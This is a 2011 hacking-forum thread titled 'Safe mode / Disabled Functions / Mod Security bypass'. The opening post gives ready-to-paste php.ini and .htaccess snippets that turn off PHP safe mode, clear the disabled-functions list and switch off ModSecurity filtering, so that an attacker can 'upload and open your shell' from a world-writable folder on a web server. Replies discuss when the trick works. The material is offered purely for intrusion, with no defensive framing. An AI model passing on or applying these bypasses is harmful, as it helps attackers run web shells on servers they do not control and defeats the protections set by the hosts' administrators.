Author Topic: Safe mode / Disabled Functions / Mod Security bypass (Read 8928 times)

hacker@sr.gov.yu · « **on:** April 10, 2011, 03:31:47 pm »

================
Safemode = On (Secure)
================
Disabled_Functions =
dl, passthru, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid
================

Create A File "Php.ini" In Some Writeable Folder (777) Then Upload And Open Your Shell From There
---------------------
Paste This:

Code: [Select]

safe_mode = OFF
disable_functions = NONE

================
ModSecurity = On
================

Create A File ".htaccess" In Some Writeable Folder (777) Then Upload And Open Your Shell From There
------------------------
Paste This:

Code: [Select]

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

ande · « **Reply #1 on:** April 10, 2011, 04:19:43 pm »

No way

Thats to dumb xD Have you tested that?

hacker@sr.gov.yu · « **Reply #2 on:** April 10, 2011, 04:22:36 pm »

Quote from: ande on April 10, 2011, 04:19:43 pm

No way Thats to dumb xD Have you tested that?

Its tested on some servers and it works

ca0s · « **Reply #3 on:** April 11, 2011, 06:20:24 pm »

It sometimes works. There are some servers that don't pay attention to any other php.ini file than the one is on the server's config folder.
The .htaccess one should work in every host that lets users upload their own .htaccess file.
Nice two, btw.

EvilZone

News:

Author Topic: Safe mode / Disabled Functions / Mod Security bypass (Read 8928 times)

hacker@sr.gov.yu

Safe mode / Disabled Functions / Mod Security bypass

ande

Re: Safe mode / Disabled Functions / Mod Security bypass

hacker@sr.gov.yu

Re: Safe mode / Disabled Functions / Mod Security bypass

ca0s

Re: Safe mode / Disabled Functions / Mod Security bypass